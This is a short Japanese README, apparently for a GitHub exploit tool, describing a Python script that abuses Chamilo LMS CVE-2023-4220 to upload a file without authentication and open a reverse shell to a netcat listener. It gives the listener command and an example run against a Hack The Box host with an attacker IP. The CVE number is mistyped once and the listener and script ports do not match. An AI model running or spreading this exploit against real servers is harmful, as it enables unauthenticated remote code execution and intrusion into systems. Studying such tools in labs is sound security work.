
Chamilo LMSのCVE-2023-4220に対するPythonエクスプロイトで、ファイルをアップロードし、netcatリスナーに認証不要のリバースシェルを配信します。
pip install requests
この Python スクリプトは、脆弱性 CVE-2023-422 を利用してサーバーにファイルをアップロードし、そのファイルを使って netcat リスナーにリバースシェルを送信します。これらはすべて認証なしで実行できます。ただし、Python スクリプトを正常に使用するには、以下の手順に従う必要があります。
netcat リスナーを起動:
nc -lnvp 4444
Python スクリプトの実行 (例):
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
このエクスプロイトが役に立った場合は、スターを付けていただけると嬉しいです :)